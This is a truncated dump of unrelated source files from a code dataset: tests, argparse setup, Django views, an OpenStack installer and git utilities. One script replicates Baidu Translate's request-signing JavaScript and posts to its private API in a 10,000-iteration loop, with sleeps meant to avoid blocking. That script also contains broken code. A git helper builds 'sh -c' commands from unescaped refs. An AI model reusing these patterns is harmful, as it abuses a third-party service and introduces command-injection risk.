'{0}'.format(self.name_short)\n","sub_path":"web_plant/addrbook/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"561796030","text":"import os\nimport textwrap\nimport unittest\n\nfrom jinja2 import Template\n\nfrom conans.client.cache.cache import ClientCache\nfrom conans.client.conf import get_default_settings_yml\nfrom conans.client.profile_loader import ProfileLoader\nfrom conans.errors import ConanException\nfrom conans.test.utils.test_files import temp_folder\nfrom conans.util.files import save\n\n\nclass SettingsCppStdTests(unittest.TestCase):\n\n    def setUp(self):\n        self.tmp_folder = temp_folder()\n        self.cache = ClientCache(self.tmp_folder)\n        save(os.path.join(self.cache.plugins_path, \"profile.py\"), \"\")\n\n    def _save_profile(self, compiler_cppstd=None, filename=\"default\"):\n        fullpath = os.path.join(self.cache.profiles_path, filename)\n\n        t = Template(textwrap.dedent(\"\"\"\n            [settings]\n            os=Macos\n            arch=x86_64\n            compiler=apple-clang\n            {% if compiler_cppstd %}compiler.cppstd={{ compiler_cppstd }}{% endif %}\n            compiler.libcxx=libc++\n            compiler.version=10.0\n            \"\"\"))\n\n        save(fullpath, t.render(compiler_cppstd=compiler_cppstd))\n        return filename\n\n    def test_no_compiler_cppstd(self):\n        # https://github.com/conan-io/conan/issues/5128\n        fullpath = os.path.join(self.cache.profiles_path, \"default\")\n        t = textwrap.dedent(\"\"\"\n            [settings]\n            os=Macos\n            arch=x86_64\n            compiler=apple-clang\n            compiler.libcxx=libc++\n            compiler.version=10.0\n            compiler.cppstd = 14\n            \"\"\")\n        save(self.cache.settings_path, get_default_settings_yml().replace(\"cppstd\", \"foobar\"))\n        save(fullpath, t)\n        profile_loader = ProfileLoader(self.cache)\n        with self.assertRaisesRegex(ConanException,\n                                    \"'settings.compiler.cppstd' doesn't exist for 'apple-clang'\"):\n            profile_loader.from_cli_args([\"default\"], None, None, None, None)\n\n    def test_no_value(self):\n        self._save_profile()\n        profile_loader = ProfileLoader(self.cache)\n        r = profile_loader.from_cli_args([\"default\"], None, None, 
None, None)\n self.assertNotIn(\"compiler.cppstd\", r.settings)\n\n def test_value_none(self):\n self._save_profile(compiler_cppstd=\"None\")\n profile_loader = ProfileLoader(self.cache)\n # It is incorrect to assign compiler.cppstd=None in the profile\n with self.assertRaisesRegex(ConanException, \"Invalid setting\"):\n r = profile_loader.from_cli_args([\"default\"], None, None, None, None)\n\n def test_value_valid(self):\n self._save_profile(compiler_cppstd=\"11\")\n profile_loader = ProfileLoader(self.cache)\n r = profile_loader.from_cli_args([\"default\"], None, None, None, None)\n self.assertEqual(r.settings[\"compiler.cppstd\"], \"11\")\n self.assertNotIn(\"cppstd\", r.settings)\n\n def test_value_invalid(self):\n self._save_profile(compiler_cppstd=\"13\")\n profile_loader = ProfileLoader(self.cache)\n with self.assertRaisesRegex(ConanException, \"Invalid setting '13' is not a valid \"\n \"'settings.compiler.cppstd' value\"):\n r = profile_loader.from_cli_args([\"default\"], None, None, None, None)\n","sub_path":"conans/test/unittests/client/profile_loader/compiler_cppstd_test.py","file_name":"compiler_cppstd_test.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"234855139","text":"import argparse\nimport pathlib\n\n\ndef get_core_parser(extra_args=False):\n \"\"\"\n Sub-parser containing core audio module arguments. Used by both yamfp\n in this module and by the top-level yam command.\n\n Args:\n extra_args (bool): Include extra args required not required for\n spectrogram/fingerprint visualization by the yamfp CLI.\n \"\"\"\n core_parser = argparse.ArgumentParser(add_help=False)\n\n fingerprint_args = core_parser.add_argument_group(\"fingerprint arguments\")\n\n fingerprint_args.add_argument(\n \"--erosion-iterations\", type=int, default=1, metavar=\"\",\n help=\"Number of times to apply binary erosion for peak finding\"\n )\n fingerprint_args.add_argument(\n \"-f\", \"--fanout\", type=int, default=10, metavar=\"\",\n help=\"Number of adjacent peaks to consider for generating hashes\"\n )\n fingerprint_args.add_argument(\n \"--filter-connectivity\", type=int, default=1, choices=(1, 2),\n help=\"Max filter neighborhood connectivity for peak finding\"\n )\n fingerprint_args.add_argument(\n \"--filter-dilation\", type=int, default=10, metavar=\"\",\n help=\"Max filter dilation (neighborhood size) for peak finding\"\n )\n\n if extra_args:\n fingerprint_args.add_argument(\n \"-l\", \"--hash-length\", type=int, default=40, metavar=\"\",\n help=\"Truncate fingerprint SHA1 hashes to --hash-length (max 40)\"\n )\n\n fingerprint_args.add_argument(\n \"--max-time-delta\", type=float, default=100, metavar=\"\",\n help=\"Target zone max time offset difference for hashes\"\n )\n fingerprint_args.add_argument(\n \"--min-time-delta\", type=float, default=0, metavar=\"\",\n help=\"Target zone min time offset difference for hashes\"\n )\n\n fingerprint_args.add_argument(\n \"-a\", \"--min-amplitude\", type=float, default=10, metavar=\"\",\n help=\"Spectogram peak minimum amplitude in dB\"\n )\n fingerprint_args.add_argument(\n \"--spectrogram-backend\", type=str, choices=(\"scipy\", \"matplotlib\"),\n default=\"scipy\",\n help=\"Library to use for computing spectrogram\"\n )\n fingerprint_args.add_argument(\n \"--win-overlap-ratio\", type=float, default=0.5, metavar=\"\",\n help=\"Window overlap as a fraction of window size, in the range [0, 1)\"\n )\n fingerprint_args.add_argument(\n \"--win-size\", 
type=int, default=4096, metavar=\"\",\n        help=\"Number of samples per FFT window\"\n    )\n    return core_parser\n\n\ndef get_parser():\n    \"\"\"\n    Get arg parser for the audio module CLI (i.e., yamfp command).\n    \"\"\"\n    core_parser = get_core_parser()\n    parser = argparse.ArgumentParser(\n        parents=[core_parser],\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n        description=\"Visualize an audio file fingerprint by plotting its \"\n        \"spectrogram, spectrogram peaks, and/or fingerprint (peak pairs).\"\n    )\n\n    parser.add_argument(\n        \"filepath\", type=pathlib.Path, metavar=\"\",\n        help=\"Path to audio file\"\n    )\n    parser.add_argument(\n        \"-c\", \"--channels\", nargs=\"+\", type=int, metavar=\"\",\n        help=\"Plot only the specified audio channels (beginning at 0)\"\n    )\n    parser.add_argument(\n        \"-p\", \"--no-peaks\", action=\"store_true\",\n        help=\"Do not plot spectrogram peaks\"\n    )\n    parser.add_argument(\n        \"-F\", \"--plot-fingerprints\", action=\"store_true\",\n        help=\"Plot fingerprint constellations between peak pairs instead of \"\n        \"plotting spectrogram\"\n    )\n    parser.add_argument(\n        \"-t\", \"--title\", type=str, metavar=\"\",\n        help=\"Set plot title; defaults to filename if omitted\"\n    )\n    parser.add_argument(\n        \"--start\", type=float, metavar=\"<seconds>\",\n        help=\"Audio segment start time in seconds (beginning of file if omitted)\"\n    )\n    parser.add_argument(\n        \"--end\", type=float, metavar=\"<seconds>\",\n        help=\"Audio segment end time in seconds (end of file if omitted)\"\n    )\n\n    # Update defaults of some existing values to make them more reasonable for\n    # plotting and visualization.\n    parser.set_defaults(fanout=3, min_time_delta=1, max_time_delta=10)\n    return parser\n","sub_path":"youtube_audio_matcher/audio/_argparsers.py","file_name":"_argparsers.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"172320920","text":"#!/usr/bin/python\n\nimport sys\nsys.path.append(\"../tools/\")\n\nimport matplotlib.pyplot\nimport numpy as np\nimport pprint\nfrom feature_format import featureFormat, targetFeatureSplit\n\ndef show_boxplot(data, name):\n    import seaborn as sns\n    sns.violinplot(data, color=\"green\", orient=\"v\", title=name)\n    sns.plt.show()\n\ndef show_features(data_dict, feat1, feat2):\n    data = featureFormat(data_dict, [feat1, feat2])\n    data_poi = featureFormat(data_dict, [\"poi\"])\n    for point in data:\n        matplotlib.pyplot.scatter(point[0], point[1])\n\n    matplotlib.pyplot.xlabel(feat1)\n    matplotlib.pyplot.ylabel(feat2)\n    matplotlib.pyplot.show()\n    # print \"highest\", feat1, dict_find(feat1, data[:, 0].max())\n    # print \"highest\", feat2, dict_find(feat2, data[:, 1].max())\n\n# def dict_find(key, value):\n#     for name, data in data_dict.iteritems():\n#         if (data[key] == value):\n#             return name\n\ndef get_higher(data, percentil):\n    return np.argsort(data)[::-1][0:int(len(data) * percentil)]\n\ndef get_lower(data, percentil):\n    return np.argsort(data)[0:int(len(data) * percentil)]\n\ndef clean_outilers(data_dict, features_list, percentile=10):\n    data_dict.pop(\"TOTAL\", 0)\n    data_dict.pop(\"LOCKHART EUGENE E\", 0)\n    data_array = featureFormat( data_dict, features_list, remove_all_zeroes=False )\n    to_remove = []\n\n    for i in range(1, len(features_list)):\n        for h in get_higher(data_array[:, i], percentile/100):\n            if data_array[h, i] > np.percentile(data_array[:, i], 75) and data_array[h, 0] == 0.0: # is not poi\n                to_remove.append(list(data_dict.keys())[h])\n        for l in get_lower(data_array[:, i], percentile / 100):\n            if data_array[l, i] < np.percentile(data_array[:, i], 25) and data_array[l, 0] == 0.0: # is not poi\n                to_remove.append(list(data_dict.keys())[l])\n\n    for r in to_remove:\n        data_dict.pop(r, 0)\n\n    return data_dict","sub_path":"final_project/remove_outliers.py","file_name":"remove_outliers.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"554283119","text":"\"\"\"\nView\nGets data from controller\n\"\"\"\n\nfrom mvc import controller\n\n\nclass Error:\n    @staticmethod\n    def no_file():\n        print(\"\\nThere is no Data to show right now.\")\n    @staticmethod\n    def no_such_course_type():\n        print(\"\\nThere is no such course type.\")\n    @staticmethod\n    def no_teachers():\n        print(\"\\nThere's no teacher in our database right now.\")\n    @staticmethod\n    def no_such_key():\n        print(\"\\nThere's no record in the course database.\")\n\n\nclass ICourse:\n    \"\"\"Interface for Course\n    Get data from controller\n    \"\"\"\n\n    def Course_Interface(self, data):\n        \"\"\"type and course name\"\"\"\n        print(\n            \"\\nCourse Type : Course names\", data,\n            \"\\nInput any key to return to the main menu.\")\n        input()\n        ICourseFactory.menu(self)\n\n    def i_course_Enter(self):\n        print(\"1. Input > type of course: 'local' or 'offsite' :\")\n        print(\"2. Input > Course name:\")\n        print(\"3. Input > Course code:\")\n\n    def i_course_topics_Enter(self):\n        print(\"1. Input > Local course topics. Separate with comma (,) :\", end=\"\")\n        print(\"2. Input > Course code :\")\n\n\nclass ITeacher:\n    \"\"\"Interface for Teacher Information\n    \"\"\"\n\n    def Teacher_Interface(self, data):\n        \"\"\"name and course code\"\"\"\n        print(\n            \"\\nTeacher Name : Course Code\", data,\n            \"\\nInput any key to return to the main menu.\")\n        input()\n        ICourseFactory.menu(self)\n\n    def i_teacher_Enter(self):\n        print(\"1. Input > Teacher's name:\")\n        print(\"2. Input > Teacher's course code:\")\n\n\nclass ILocalCourse(ICourse):\n    \"\"\"Interface for Local Courses\"\"\"\n\n    def Local_Course_Interface(self, data):\n        \"\"\"course name and topics\"\"\"\n        print(\n            \"\\nCourse Name : Topics\", data,\n            \"\\nInput any key to return to the main menu.\"\n        )\n        input()\n        ICourseFactory.menu(self)\n\n\nclass IOffsiteCourse(ICourse):\n    \"\"\"Interface for Offsite Courses\"\"\"\n\n    def Offsite_Course_Interface(self, data):\n        \"\"\"course name and topics\"\"\"\n        print(\n            \"\\nTopic Name : Course Code\", data,\n            \"\\nInput any key to return to the main menu.\"\n        )\n        input()\n        ICourseFactory.menu(self)\n\n\nclass ICourseFactory(ITeacher, ILocalCourse, IOffsiteCourse):\n    \"\"\"Interface for Course Factory\n    for creating courses, inputting teachers, courses...\"\"\"\n\n    def __init__(self):\n        self.control = controller.CourseFactory()\n        super().__init__()\n\n    def run(self):\n        print(\"\\nGreeting. 
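Aside: a quick numeric check of the corrected percentile guard in clean_outilers above; np.percentile(a, 75) is the 75th-percentile threshold, and the POI-flag comparison is now a separate boolean condition rather than part of the percentile argument. Toy data only.

    import numpy as np

    a = np.arange(1, 101, dtype=float)
    # exactly the top quarter of 1..100 exceeds the 75th percentile
    assert (a > np.percentile(a, 75)).sum() == 25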
Welcome To The Worlds Most Awesome Course Corporation Software.\"\n \"\\nOur job is to help you to create courses.\"\n \"\\nHere are the current Courses in our database.\")\n self.control.course_info()\n ICourseFactory.menu(self)\n\n def menu(self):\n print(\"Input Commands: \"\n \"\\n ** 1 ** to view current course information\"\n \"\\n ** 2 ** to view teachers information\"\n \"\\n ** 3 ** to view Local courses\"\n \"\\n ** 4 ** to view Offsite courses \"\n \"\\n ** 9 ** to create new course.\"\n \"\\n ** 0 ** to exit.\")\n self.control.choose()\n","sub_path":"Semester_2_Labs/Lab_3_General_Assignments/E_G_Task_2/mvc/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"577021293","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom anvil import colorizer\nfrom anvil import log as logging\nfrom anvil import shell as sh\nfrom anvil import utils\n\nfrom anvil.components import base_install as binstall\nfrom anvil.components import base_runtime as bruntime\n\nfrom anvil.components.configurators import cinder as cconf\n\nLOG = logging.getLogger(__name__)\n\n# Sync db command\nSYNC_DB_CMD = [sh.joinpths('$BIN_DIR', 'cinder-manage'),\n # Available commands:\n 'db', 'sync']\n\n\nclass CinderInstaller(binstall.PythonInstallComponent):\n def __init__(self, *args, **kargs):\n binstall.PythonInstallComponent.__init__(self, *args, **kargs)\n self.configurator = cconf.CinderConfigurator(self)\n\n def post_install(self):\n binstall.PythonInstallComponent.post_install(self)\n if self.get_bool_option('db-sync'):\n self.configurator.setup_db()\n self._sync_db()\n\n def _sync_db(self):\n LOG.info(\"Syncing cinder to database: %s\", colorizer.quote(self.configurator.DB_NAME))\n cmds = [{'cmd': SYNC_DB_CMD}]\n utils.execute_template(*cmds, cwd=self.bin_dir, params=self.config_params(None))\n\n def config_params(self, config_fn):\n mp = binstall.PythonInstallComponent.config_params(self, config_fn)\n mp['BIN_DIR'] = self.bin_dir\n return mp\n\n\nclass CinderRuntime(bruntime.PythonRuntime):\n def __init__(self, *args, **kargs):\n bruntime.PythonRuntime.__init__(self, *args, **kargs)\n self.config_path = sh.joinpths(self.get_option('cfg_dir'), cconf.API_CONF)\n\n @property\n def applications(self):\n apps = []\n for (name, _values) in self.subsystems.items():\n name = \"cinder-%s\" % (name.lower())\n path = sh.joinpths(self.bin_dir, name)\n if sh.is_executable(path):\n apps.append(bruntime.Program(name, path, argv=self._fetch_argv(name)))\n return apps\n\n def app_params(self, program):\n params = bruntime.PythonRuntime.app_params(self, program)\n params['CFG_FILE'] = self.config_path\n return params\n\n def _fetch_argv(self, name):\n return [\n '--config-file', '$CFG_FILE',\n 
]\n","sub_path":"anvil/components/cinder.py","file_name":"cinder.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"292401886","text":"import os\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom django.http import HttpResponse\n\n\nfrom . import database\nfrom .models import PageView\n\n# Create your views here.\n\n\ndef index(request):\n hostname = os.getenv(\"HOSTNAME\", \"unknown\")\n PageView.objects.create(hostname=hostname)\n\n return render(\n request,\n \"welcome/index.html\",\n {\n \"hostname\": hostname,\n \"database\": database.info(),\n \"count\": PageView.objects.count(),\n },\n )\n\n\ndef health(request):\n return HttpResponse(PageView.objects.count())\n\n\ndef header_default(request):\n response = render(request, \"welcome/header.html\")\n return response\n\n\ndef header_overwritten(request):\n response = render(request, \"welcome/header.html\")\n response[\"Cache-Control\"] = \"public\"\n response[\"X-My-Other-Header\"] = \"custom\"\n return response\n\n\ndef headers(request):\n headers = \"\\n\".join(\n [\"{key}={value}\".format(key=key, value=value) for key, value in request.META.items()]\n )\n return HttpResponse(content=headers, content_type=\"text/plain\")\n","sub_path":"welcome/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"357397110","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# 广医五院 志明 2019-05-23 10:32\n# 当前计算机登录名称 :andy\n# 项目名称 :andy\n# 编译器 :PyCharm\n__author____ = '志明'\n__time__ = '2019-05-23 10:32'\n\nimport re\nimport requests as rq\nimport execjs\nimport os\nimport csv\n\na = ''' \n function a(r) {\n if (Array.isArray(r)) {\n for (var o = 0, t = Array(r.length); o < r.length; o++)\n t[o] = r[o];\n return t\n }\n return Array.from(r)\n }\n function n(r, o) {\n for (var t = 0; t < o.length - 2; t += 3) {\n var a = o.charAt(t + 2);\n a = a >= \"a\" ? a.charCodeAt(0) - 87 : Number(a),\n a = \"+\" === o.charAt(t + 1) ? r >>> a : r << a,\n r = \"+\" === o.charAt(t) ? r + a & 4294967295 : r ^ a\n }\n return r\n }\n var i = null;\n function e(r) {\n var t = r.length;\n t > 30 && (r = \"\" + r.substr(0, 10) + r.substr(Math.floor(t / 2) - 5, 10) + r.substr(-10, 10))\n\n var u = void 0, l = \"\" + String.fromCharCode(103) + String.fromCharCode(116) + String.fromCharCode(107);\n \n u = null !== i ? i : (i = '320305.131321201' || \"\") || \"\";\n for (var d = u.split(\".\"), m = Number(d[0]) || 0, s = Number(d[1]) || 0, S = [], c = 0, v = 0; v < r.length; v++) {\n var A = r.charCodeAt(v);\n 128 > A ? S[c++] = A : (2048 > A ? S[c++] = A >> 6 | 192 : (55296 === (64512 & A) && v + 1 < r.length && 56320 === (64512 & r.charCodeAt(v + 1)) ? 
(A = 65536 + ((1023 & A) << 10) + (1023 & r.charCodeAt(++v)),\n S[c++] = A >> 18 | 240,\n S[c++] = A >> 12 & 63 | 128) : S[c++] = A >> 12 | 224,\n S[c++] = A >> 6 & 63 | 128),\n S[c++] = 63 & A | 128)\n }\n for (var p = m, F = \"\" + String.fromCharCode(43) + String.fromCharCode(45) + String.fromCharCode(97) + (\"\" + String.fromCharCode(94) + String.fromCharCode(43) + String.fromCharCode(54)), D = \"\" + String.fromCharCode(43) + String.fromCharCode(45) + String.fromCharCode(51) + (\"\" + String.fromCharCode(94) + String.fromCharCode(43) + String.fromCharCode(98)) + (\"\" + String.fromCharCode(43) + String.fromCharCode(45) + String.fromCharCode(102)), b = 0; b < S.length; b++)\n p += S[b],\n p = n(p, F);\n return p = n(p, D),\n p ^= s,\n 0 > p && (p = (2147483647 & p) + 2147483648),\n p %= 1e6,\n p.toString() + \".\" + (p ^ m)\n }\n '''\n\n\ndef main():\n import time\n import random\n from SuTranslate.UserAgentInfos import UserAgentInfos\n url = \"https://fanyi.baidu.com/\"\n # response = rq.get(url, headers=header)\n headers = {'User-Agent': UserAgentInfos.GetUserAgent()}\n # 代理只针对访问的协议有关,访问http会随机选取http中的ip,若无,则使用真实ip地址\n proxies = {'https': None,\n 'http': None, }\n # 使用同一Session进行调用接口,可以使请求头自动带上Cookies\n sess = rq.Session()\n response = sess.get(url=url, headers=headers, timeout=5, proxies=proxies)\n # 请求两次避免出现cookies过期,请求两次出现过期的概率极低,加上headers,否则请求头部不带上Cookies\n response = sess.get(url=url, headers=headers, timeout=5, proxies=proxies)\n # print(response.raw._connection.sock.getpeername()[0])\n # 使用正则表达式提取token\n token = re.findall(r\"token: '(.*?)',\", response.text)[0]\n b = execjs.compile(a)\n Text = '测试'\n sign = b.call('e', Text)\n data = {\n 'from': 'zh',\n 'to': 'en',\n 'query': Text,\n 'simple_means_flag': 3,\n 'sign': sign,\n 'token': token\n }\n url2 = 'https://fanyi.baidu.com/v2transapi'\n time.sleep(random.random())\n result = sess.post(url=url2, data=data, timeout=5, proxies=proxies)\n if result.status_code != 200:\n print(result)\n print(\"访问失败!\")\n exit(1)\n print(result, result.status_code, result.json())\n # 使用随机睡眠减少被封\n import time\n import random\n for i in range(10000):\n result = sess.post(url=url2, data=data, proxies=proxies)\n print(i)\n if result.status_code != 200:\n print(result)\n break\n # print(result.json()['trans_result']['data'][0])\n print(result, result.status_code, result.json())\n t = random.random() * 2\n print(t)\n time.sleep(t)\n\n\ndef write_file_csv(file_name=\"\", msg=\"\"):\n if len(file_name.strip()) == 0 or not isinstance(file_name, (str,)):\n return {'error': 1, 'msg': '文件名称为非字符串或者为空'}\n if not isinstance(msg, (str, list, tuple, dict, set,)):\n return {'error': 2, 'msg': '要写入的内容不符合要求'}\n elif (isinstance(msg, (str,)) and len(msg.strip()) == 0) or (isinstance(msg, (list, set, tuple)) and len(msg) == 0):\n return {'error': 3, 'msg': '要写入的内容为空'}\n # 将指定的文本内容写到file_name.csv文件中\n file_name = file_name.replace(file_name[-4:], '-1.csv')\n try:\n with open(file_name, 'a', newline=\"\") as f:\n w_csv = csv.writer(f)\n if isinstance(msg, (str,)):\n w_csv.writerow((msg,))\n else:\n w_csv.writerow((msg[0], msg[1]))\n f.close()\n return {'error': 0, 'msg': '文件写入成功!'}\n except IndexError:\n return {'error': 4, 'msg': '数组越界,请多传入几个数据!'}\n except PermissionError:\n return {'error': 5, 'msg': '文件写入权限被拒绝!'}\n\n\ndef read_file_csv(file_name=\"\"):\n \"\"\"\n 从csv文件读取数据,返回列表\n :param file_name: 文件名\n :return:\n \"\"\"\n if len(file_name.strip()) == 0 or not isinstance(file_name, (str,)):\n return {'error': 1, 'msg': '文件名称为非字符串或者为空'}\n data = list()\n with 
open(file_name, 'r') as f:\n r_csv = csv.reader(f)\n for row in r_csv:\n data.append(row)\n f.close()\n return {'error': 1, 'msg': '文件名称为非字符串或者为空', 'result': data}\n\n\ndef is_contain_chinese(check_str):\n \"\"\"\n 判断字符串中是否包含中文\n :param check_str: {str} 需要检测的字符串\n :return: {bool} 包含返回True, 不包含返回False\n \"\"\"\n for ch in check_str:\n if u'\\u4e00' <= ch <= u'\\u9fff':\n return 1\n return 0\n\n\nif __name__ == '__main__':\n file = f'c:/Users/andy/Desktop/zh_CN.locale.csv'\n file2 = f'c:/Users/andy/Desktop/zh_CN.locale-1.csv'\n r1 = set(read_file_csv(file)['result'])\n r2 = set(read_file_csv(file2)['result'])\n # 得到需要翻译的集合\n # r\n print(len(r))\n","sub_path":"TensorflowTest/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"3115666","text":"#!/usr/bin/python3\n\"\"\"Handles the current session\"\"\"\n\nimport os\nimport sys\nfrom http import cookies\nimport shelve\nimport time\nimport hashlib\n\n__SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))\n__SCRIPT_DIR = os.path.normpath(os.path.join(__SCRIPT_DIR, '..'))\nif not __SCRIPT_DIR in sys.path:\n sys.path.append(__SCRIPT_DIR)\n\nfrom utils import config\n\nsys.path.append(config.SESSION_FILES_ROOT_PATH)\n\nSESSION = None\nclass Session(object):\n \n def __init__(self, expires=None, cookie_path=None):\n string_cookie = os.environ.get('HTTP_COOKIE', '')\n self.cookie = cookies.SimpleCookie()\n self.cookie.load(string_cookie)\n \n #if S_ID in self.cookie:\n # sid = self.cookie[S_ID].value\n #global Data\n if self.cookie.get('sid'):\n sid = self.cookie['sid'].value\n # Clear session cookie from other cookies\n self.cookie.clear()\n\n else:\n self.cookie.clear()\n sid = hashlib.sha256(repr(time.time()).encode()).hexdigest()\n\n self.cookie['sid'] = sid\n\n if cookie_path:\n self.cookie['sid']['path'] = cookie_path\n \n session_dir = config.SESSION_FILES_FOLDER_PATH\n \n '''\n if not os.path.exists(session_dir):\n try:\n os.mkdir(session_dir, 0o2770)\n # If the apache user can't create it do it manualy\n except OSError as e:\n errmsg = \"\"\"\n %s when trying to create the session directory.\n Create it as '%s'\n \"\"\" % (e.strerror, os.path.abspath(session_dir))\n raise OSError \n ''' \n '''\n self.data = shelve.open (\n '%s/sess_%s' % (session_dir, sid), \n writeback=True\n )\n nsid = sid# + '.db'\n os.chmod('%s/sess_%s' % (session_dir, nsid), 0o660)\n '''\n # Initializes the expires data\n #if not self.data.get('cookie'):\n # self.data['cookie'] = {'expires':''}\n\n self.set_expires(expires)\n #Data = self.data\n\n def set_expires(self, expires=None):\n if expires == '':\n self.cookie['sid']['expires'] = ''\n elif isinstance(expires, int):\n self.cookie['sid']['expires'] = expires\n","sub_path":"utils/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"652097871","text":"#!/usr/bin/env python3\n\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom typing import cast, Any, Dict, List, Optional, Tuple, Union\nimport os\n\n\ndef _check_output(items: List[str], encoding: str = \"utf-8\") -> str:\n from subprocess import check_output\n return check_output(items).decode(encoding)\n\n\ndef fuzzy_list_to_dict(items: List[Tuple[str, str]]) -> Dict[str, List[str]]:\n \"\"\"\n Converts list to dict preserving elements with 
duplicate keys\n \"\"\"\n rc: Dict[str, List[str]] = defaultdict(lambda: [])\n for (key, val) in items:\n rc[key].append(val)\n return dict(rc)\n\n\nclass GitCommit:\n commit_hash: str\n title: str\n body: str\n author: str\n author_date: datetime\n commit_date: Optional[datetime]\n\n def __init__(self,\n commit_hash: str,\n author: str,\n author_date: datetime,\n title: str,\n body: str,\n commit_date: Optional[datetime] = None) -> None:\n self.commit_hash = commit_hash\n self.author = author\n self.author_date = author_date\n self.commit_date = commit_date\n self.title = title\n self.body = body\n\n def __repr__(self) -> str:\n return f\"{self.title} ({self.commit_hash})\"\n\n def __contains__(self, item: Any) -> bool:\n return item in self.body or item in self.title\n\n\ndef parse_fuller_format(lines: Union[str, List[str]]) -> GitCommit:\n \"\"\"\n Expect commit message generated using `--format=fuller --date=unix` format, i.e.:\n commit <sha1>\n Author: <author>\n AuthorDate: <author date>\n Commit: <committer>\n CommitDate: <committer date>\n\n <title line>\n\n <full commit message>\n\n \"\"\"\n if isinstance(lines, str):\n lines = lines.split(\"\\n\")\n # TODO: Handle merge commits correctly\n if len(lines) > 1 and lines[1].startswith(\"Merge:\"):\n del lines[1]\n assert len(lines) > 7\n assert lines[0].startswith(\"commit\")\n assert lines[1].startswith(\"Author: \")\n assert lines[2].startswith(\"AuthorDate: \")\n assert lines[3].startswith(\"Commit: \")\n assert lines[4].startswith(\"CommitDate: \")\n assert len(lines[5]) == 0\n return GitCommit(commit_hash=lines[0].split()[1].strip(),\n author=lines[1].split(\":\", 1)[1].strip(),\n author_date=datetime.fromtimestamp(int(lines[2].split(\":\", 1)[1].strip())),\n commit_date=datetime.fromtimestamp(int(lines[4].split(\":\", 1)[1].strip())),\n title=lines[6].strip(),\n body=\"\\n\".join(lines[7:]),\n )\n\n\nclass GitRepo:\n def __init__(self, path: str, remote: str = \"origin\") -> None:\n self.repo_dir = path\n self.remote = remote\n\n def _run_git(self, *args: Any) -> str:\n return _check_output([\"git\", \"-C\", self.repo_dir] + list(args))\n\n def revlist(self, revision_range: str) -> List[str]:\n rc = self._run_git(\"rev-list\", revision_range, \"--\", \".\").strip()\n return rc.split(\"\\n\") if len(rc) > 0 else []\n\n def current_branch(self) -> str:\n return self._run_git(\"symbolic-ref\", \"--short\", \"HEAD\").strip()\n\n def checkout(self, branch: str) -> None:\n self._run_git('checkout', branch)\n\n def show_ref(self, name: str) -> str:\n refs = self._run_git('show-ref', '-s', name).strip().split('\\n')\n if not all(refs[i] == refs[0] for i in range(1, len(refs))):\n raise RuntimeError(f\"referce {name} is ambigous\")\n return refs[0]\n\n def rev_parse(self, name: str) -> str:\n return self._run_git('rev-parse', '--verify', name).strip()\n\n def get_merge_base(self, from_ref: str, to_ref: str) -> str:\n return self._run_git('merge-base', from_ref, to_ref).strip()\n\n def patch_id(self, ref: Union[str, List[str]]) -> List[Tuple[str, str]]:\n is_list = isinstance(ref, list)\n if is_list:\n if len(ref) == 0:\n return []\n ref = \" \".join(ref)\n rc = _check_output(['sh', '-c', f'git -C {self.repo_dir} show {ref}|git patch-id --stable']).strip()\n return [cast(Tuple[str, str], x.split(\" \", 1)) for x in rc.split(\"\\n\")]\n\n def get_commit(self, ref: str) -> GitCommit:\n return parse_fuller_format(self._run_git('show', '--format=fuller', '--date=unix', '--shortstat', ref))\n\n def cherry_pick(self, ref: str) -> None:\n 
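# the -x flag appends a '(cherry picked from commit ...)' trailer to the\n        # new commit message, keeping each synced commit traceable to its source\n        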
self._run_git('cherry-pick', '-x', ref)\n\n    def compute_branch_diffs(self, from_branch: str, to_branch: str) -> Tuple[List[str], List[str]]:\n        \"\"\"\n        Returns lists of commits that are missing in each other's branch since their merge base\n        Might be slow if the merge base between the two branches is pretty far off\n        \"\"\"\n        from_ref = self.rev_parse(from_branch)\n        to_ref = self.rev_parse(to_branch)\n        merge_base = self.get_merge_base(from_ref, to_ref)\n        from_commits = self.revlist(f'{merge_base}..{from_ref}')\n        to_commits = self.revlist(f'{merge_base}..{to_ref}')\n        from_ids = fuzzy_list_to_dict(self.patch_id(from_commits))\n        to_ids = fuzzy_list_to_dict(self.patch_id(to_commits))\n        for patch_id in set(from_ids).intersection(set(to_ids)):\n            from_values = from_ids[patch_id]\n            to_values = to_ids[patch_id]\n            if len(from_values) != len(to_values):\n                # Eliminate duplicate commits+reverts from the list\n                while 